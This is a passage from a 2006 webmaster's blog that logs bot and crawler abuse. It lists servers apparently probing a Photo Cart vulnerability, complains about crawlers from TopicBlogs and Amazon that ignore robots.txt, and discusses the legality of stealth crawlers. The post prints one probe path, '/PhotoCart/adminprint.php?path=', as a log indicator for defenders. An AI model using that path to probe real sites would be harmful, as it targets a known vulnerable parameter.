195.242.211.253 [faq.ecobike.de.] requested 24 pages as "libwww-perl/5.48"
82.210.7.28 [82.210.7.28.rev.worldbone.de.] requested 29 pages as "libwww-perl/5.803"


Maybe it's time I send a few letters to the owners of these compromised servers and see what happens.

Thursday, December 07, 2006

Day Two of the Photo Cart Attack

Very interesting to watch this Photo Cart vulnerability probe continue as some of the same IPs attacked yet again but there were some new locations joining in the assault.

The morons launching this assault just didn't seem to understand that my site doesn't run Photo Cart when they attacked me yesterday and like a bunch of deaf, dumb and blind lemmings did they same stupid thing again today.

Here's todays list of sites trying to attack:

72.29.83.98 [jet33.hasweb.com.] requested 47 pages as "libwww-perl/5.805"
72.29.76.238 [72-29-76-238.static.dimenoc.com.] requested 47 pages as "libwww-perl/5.805"
66.7.193.220 [interzone.shiftinteractive.net.] requested 100 pages as "libwww-perl/5.805"
216.55.166.52 [216-55-166-52.dedicated.abac.net.] requested 8 pages as "libwww-perl/5.803"
72.29.82.174 [pass57.dizinc.com.] requested 4 pages as "libwww-perl/5.805"
72.29.74.43 [deso.surpasshosting.com.] requested 8 pages as "libwww-perl/5.805"
67.19.74.138 [www2.comradelycertitude.com.] requested 117 pages as "libwww-perl/5.805"
64.8.118.4 [64-8-118-4.hsphereweb.com.] requested 108 pages as "libwww-perl/5.801"
64.8.118.5 [64-8-118-5.hsphereweb.com.] requested 108 pages as "libwww-perl/5.801"
66.70.121.80 [unknown] requested 12 pages as "libwww-perl/5.65"
66.40.38.148 [host148.maxim.net.] requested 8 pages as "libwww-perl/5.65"
67.19.224.66 [lamda.asmallorange.com.] requested 18 pages as "libwww-perl/5.805"
208.101.29.107 [asprojectos.com.] requested 93 pages as "libwww-perl/5.805"
204.11.234.28 [vn1133.fireboxhosting.com.] requested 80 pages as "libwww-perl/5.805"
66.55.78.18 [66-55-78-18.yourhostingprovider.net.] requested 48 pages as "libwww-perl/5.801"
81.181.15.6 [mail.cipnet.ro.] requested 36 pages as "libwww-perl/5.805"
209.172.35.53 [ip-209-172-35-53.reverse.privatedns.com.] requested 38 pages as "libwww-perl/5.79"
69.10.142.59 [unknown.rackforce.com.] requested 17 pages as "libwww-perl/5.805"
66.39.177.8 [shweet.bendug.org.] requested 2 pages as "gnootBot"
189.146.75.42 [dsl-189-146-75-42.prod-infinitum.com.mx.] requested 17 pages as "libwww-perl/5.803"
219.93.90.33 [unknown] requested 20 pages as "libwww-perl/5.65"
84.31.119.195 [cp113881-a.dbsch1.nb.home.nl.] requested 1 pages as "Ecrw7jipqgslb7fygbgqpshwirc"
203.167.111.133 [133.111.167.203.assigned.static.eastern-tele.com.] requested 16 pages as "libwww-perl/5.79"
158.66.1.12 [service2.mg.gov.pl.] requested 76 pages as "libwww-perl/5.65"
66.240.252.55 [su9325255.aspadmin.net.] requested 12 pages as "libwww-perl/5.803"
68.186.32.50 [68-186-32-50.static.scrm.ca.charter.com.] requested 15 pages as "libwww-perl/5.79"
72.51.34.179 [server1.reptileforums.com.] requested 11 pages as "libwww-perl/5.79"
209.47.139.138 [server.privatelabelarticlesite.net.] requested 2 pages as "libwww-perl/5.805"
195.242.211.253 [faq.ecobike.de.] requested 1 pages as "libwww-perl/5.48"BAD_AGENT: 67.159.26.45 [sanalsistem.net.] requested 7 pages as "libwww-perl/5.805"
163.178.79.2 [server.micit.go.cr.] requested 9 pages as "libwww-perl/5.803"
I truly feel bad for any idiots running Photo Cart about now.

Wednesday, December 06, 2006

TopicBlogs Steps Over The Line

TopicBlogs hasn't even launched yet but they managed to piss me off stepping over the boundary.

The RSS feed is fair game, but pulling the linked pages without permission is NOT fair game.

Here's an example:

72.36.205.106 "GET /rss_feed.xml HTTP/1.0" "topicblogs/0.9"
72.36.205.106 "GET /blogpage2.html HTTP/1.0" "topicblogs/0.9"
72.36.205.106 "GET /blogpage3.html HTTP/1.0" "topicblogs/0.9"
72.36.205.106 "GET /blogpage4.html HTTP/1.0" "topicblogs/0.9"
72.36.205.106 "GET /blogpage5.html HTTP/1.0" "topicblogs/0.9"
72.36.205.106 "GET /blogpage6.html HTTP/1.0" "topicblogs/0.9"
72.36.205.106 "GET /blogpage7.html HTTP/1.0" "topicblogs/0.9"
Maybe you people over at TopicsBlog should implement robots.txt to see if we allow you to step off the RSS feed.

Until you fix it, you're just BLOCKED!

Botnet Attempts Photo Cart Vulnerability Attack

Today some mental midget wannabe hackers tried to hit my site using what appeared to be a bunch of compromised locations looking for a Photo Cart vulnerability that they naively attempted over 1,000 times.

Can you say bot blocker you lame hacking idiots?

Check your log files for this little gem

/PhotoCart/adminprint.php?path=
Check out this list of sites that launched the attack:
66.7.193.220 [interzone.shiftinteractive.net.] requested 70 pages as "libwww-perl/5.805"
72.29.76.238 [72-29-76-238.static.dimenoc.com.] requested 50 pages as "libwww-perl/5.805"
72.29.83.98 [jet33.hasweb.com.] requested 53 pages as "libwww-perl/5.805"
72.29.66.235 [bravo.dnshttp.com.] requested 31 pages as "libwww-perl/5.805"
72.36.156.123 [osd1.myhostcenter.com.] requested 1 pages as "libwww-perl/5.805"
204.11.234.28 [vn1133.fireboxhosting.com.] requested 79 pages as "libwww-perl/5.805"
64.8.118.5 [64-8-118-5.hsphereweb.com.] requested 115 pages as "libwww-perl/5.801"
72.3.249.214 [ashopsoftware.com.] requested 50 pages as "libwww-perl/5.65"
147.202.41.61 [x.xhort.com.] requested 29 pages as "libwww-perl/5.805"
208.101.29.107 [asprojectos.com.] requested 85 pages as "libwww-perl/5.805"
209.47.167.151 [server.web-marketing-concepts.com.] requested 32 pages as "libwww-perl/5.805"
67.19.74.138 [www2.comradelycertitude.com.] requested 110 pages as "libwww-perl/5.805"
64.8.118.4 [64-8-118-4.hsphereweb.com.] requested 90 pages as "libwww-perl/5.801"
66.159.142.166 [66-159-142-166.adsl.snet.net.] requested 1 pages as "libwww-perl/5.803"
81.181.15.6 [mail.cipnet.ro.] requested 60 pages as "libwww-perl/5.805"
67.19.224.66 [lamda.asmallorange.com.] requested 44 pages as "libwww-perl/5.805"
82.165.27.174 [p15173001.pureserver.info.] requested 36 pages as "libwww-perl/5.76"
200.32.10.19 [200-32-10-19.prima.net.ar.] requested 29 pages as "libwww-perl/5.805"
216.22.48.208 [216.22.48.208.servint.net.] requested 35 pages as "libwww-perl/5.805"
83.15.63.115 [eih115.internetdsl.tpnet.pl.] requested 5 pages as "libwww-perl/5.803"
209.172.35.53 [ip-209-172-35-53.reverse.privatedns.com.] requested 36 pages as "libwww-perl/5.79"
67.18.16.82 [srv24.icx.pl.] requested 1 pages as "libwww-perl/5.805"
163.178.79.2 [server.micit.go.cr.] requested 32 pages as "libwww-perl/5.803"
203.167.111.133 [133.111.167.203.assigned.static.eastern-tele.com.] requested 15 pages as "libwww-perl/5.79"
66.40.38.148 [host148.maxim.net.] requested 11 pages as "libwww-perl/5.65"
164.77.213.115 [unknown] requested 1 pages as "libwww-perl/5.805"
195.242.211.253 [faq.ecobike.de.] requested 2 pages as "libwww-perl/5.48"
158.66.1.12 [service2.mg.gov.pl.] requested 32 pages as "libwww-perl/5.65"
219.93.90.33 [unknown] requested 4 pages as "libwww-perl/5.65"
63.246.154.22 [ukrainehosting.info.] requested 6 pages as "libwww-perl/5.805"
71.198.177.113 [c-71-198-177-113.hsd1.ca.comcast.net.] requested 2 pages as "libwww-perl/5.805"
64.8.114.14 [web-06.ihservers.com.] requested 1 pages as "libwww-perl/5.801"
209.47.139.138 [server.privatelabelarticlesite.net.] requested 1 pages as "libwww-perl/5.805"
Some appear to obviously be compromised sites.

Oh boy, let the fun begin!

Friday, December 01, 2006

Webmaster Owns Spammers Ass

This is priceless as one of the phpBB spamming idiots from Russia messed with the wrong webmaster this time who now owns his spamming ass.

You just have to read this DRC forum post to believe anyone could be so stupid.

Thanks to SpamHuntress for pointing this out.

Wednesday, November 29, 2006

Dear Amazon AWS Group

To whom it may concern,

Your bot crawled my site today as shown below. Please notify your engineers, and I use the term loosely, that "Java/1.5.0_09" is not a valid bot name. Being that Amazon sells books on how to program Java, I'm sure you can find at least one book in your warehouse that will explain how to set the User Agent string when making web requests.

Additionally, would honoring ROBOTS.TXT be too much to request or do you feel justified not checking the robots file since your programmers can't figure out how to tell us what your bot name is in the first place?

216.182.236.241 [domU-12-31-34-00-00-B9.usma2.compute.amazonaws.com.] "Java/1.5.0_09"

216.182.236.142 [domU-12-31-34-00-01-1E.usma2.compute.amazonaws.com.] "Java/1.5.0_09"

216.182.236.177 [domU-12-31-34-00-00-F9.usma2.compute.amazonaws.com] "Java/1.5.0_09"

216.182.236.110 [domU-12-31-34-00-00-2A.usma2.compute.amazonaws.com] "Java/1.5.0_09"

216.182.236.167 [domU-12-31-34-00-01-07.usma2.compute.amazonaws.com] "Java/1.5.0_09"

216.182.233.105 [domU-12-31-34-00-01-D3.usma2.compute.amazonaws.com] "Java/1.5.0_09"

216.182.230.187 [domU-12-31-33-00-03-55.usma1.compute.amazonaws.com.] "Java/1.5.0_09"

216.182.237.9 [domU-12-31-34-00-01-B5.usma2.compute.amazonaws.com.] "Java/1.5.0_09"
It makes me weep for the future when a big web conglomerate, one that has a name that is synonymous with buying things online, one that should know better, starts to slide down that slippery slope of being a bad netizen.

Signed,
Get A. Clue

SiteAdvisor and ThePlanet Must Not Care

There were several hits my blog post about SiteAdvisor from Network Associates, that owns McAfee SiteAdvisor, yet nothing changed. Wouldn't you assume that after reading my posts about SiteAdvisor Green Lighting sites with the worms in them that someone would at least change the site status to protect people.

Nope.

Funny, Symantec's Norton AntiVirus agrees with me that the site has a worm, but SiteAdvisor says you're good to visit.



Maybe they don't think it's a threat because McAfee AV products don't detect this worm?

Who knows, I'll stick with Norton AV.

Then again, we have ThePlanet that hosts these sites, and they were notified 6 days ago that this problem existed on 4 of their servers and these sites are still online and functional.

I guess nobody cares about security these days.

Tuesday, November 28, 2006

BDFetch Plays By The Rules

Normally I'm always slamming corporate bots but when one company, like brandimensions appears to be playing by all the rules, I feel they should get a little praise.

Here's what their access attempts look like:

209.167.50.22 "GET /robots.txt HTTP/1.1" "www.brandimensions.com" "BDFetch"
209.167.50.22 GET /somepage.html HTTP/1.1" "www.brandimensions.com" "BDFetch"
209.167.50.22 "GET /robots.txt HTTP/1.1" "www.brandimensions.com" "BDFetch"
209.167.50.22 GET /somepage.html HTTP/1.1" "www.brandimensions.com" "BDFetch"
209.167.50.22 "GET /robots.txt HTTP/1.1" "www.brandimensions.com" "BDFetch"
209.167.50.22 GET /somepage.html HTTP/1.1" "www.brandimensions.com" "BDFetch"
At least they asked for robots.txt and appear to only go in when allowed.

However, they had a couple of bumps that I'd like to see them fix.

1. Ask for robots.txt once or twice a day, maybe once an hour worse case, not every access.

2. Set your reverse DNS to say bdfetch.brandimensions.com or something similar so we can verify it's really your company and not someone spoofing you.

3. Include a link to a page about your crawler in the user agent, and a version number, such as ""BDFetch/1.0 +http://www.brandimensions.com/crawler.html"

Other than those minor glitches, kudos for at least trying to play by the rules and at least giving webmasters the choice to allow you to crawl or not.

Nicely done.

Legality of Stealth Robots, Are They Trespassing?

What is the legality of a stealth robot, are they doing anything wrong?

Take a look at "Computer Hacking and Unauthorized Access Laws" and you'll see there's a quagmire of various laws but the topic that's most relevant to this discussion would be "Unauthorized access" which basically covers trespassing onto a computer, theoretically even if that service is a public web server as the laws don't specify the server or service has to be private.

I'm no lawyer, so this obviously isn't valid legal advice, just my musings over the content of the California law, particularly the definitions in 502.c:

(c) Except as provided in subdivision (h), any person who commits any of the following acts is guilty of a public offense:

(1) Knowingly accesses and without permission alters, damages, deletes, destroys, or otherwise uses any data, computer, computer system, or computer network in order to either (A) devise or execute any scheme or artifice to defraud, deceive, or extort, or (B) wrongfully control or obtain money, property, or data.

(3) Knowingly and without permission uses or causes to be used computer services.
Let's examine what these transparent stealth crawlers do and see if it fits the definition.

First, the people using stealth crawlers know if they use a real user agent like "Bob's Bot 1.0" that it will expose their presence and they will be blocked. To avoid this, they mask their presence which obviously falls under "knowingly accesses and without permission" to get to the content on the web site attempting to block their trespass.

Second, after they have gained access they "wrongfully control or obtain ..., property, or data" and do with it as they please, republish without permission, use to compile reports, etc., so I think we've covered two aspects here.

Even if the act itself causes relatively little harm, there is still a potential for penalty.
(3) Knowingly and without permission uses or causes to be used computer services.

(A) For the first violation which does not result in injury, and where the value of the computer services used does not exceed four hundred dollars ($400), by a fine not exceeding five thousand dollars ($5,000), or by imprisonment in the county jail not exceeding one year, or by both that fine and imprisonment.
The obvious solution for the crawler to be technically "legal" is to simply identify the bot by an obviously unique name like "Bob's Bot 1.0" and stop trying to spoof the web server as being Internet Explorer or Firefox in order to gain access.

I'd be curious what some legal minds might think about this interpretation of these laws for this particular application.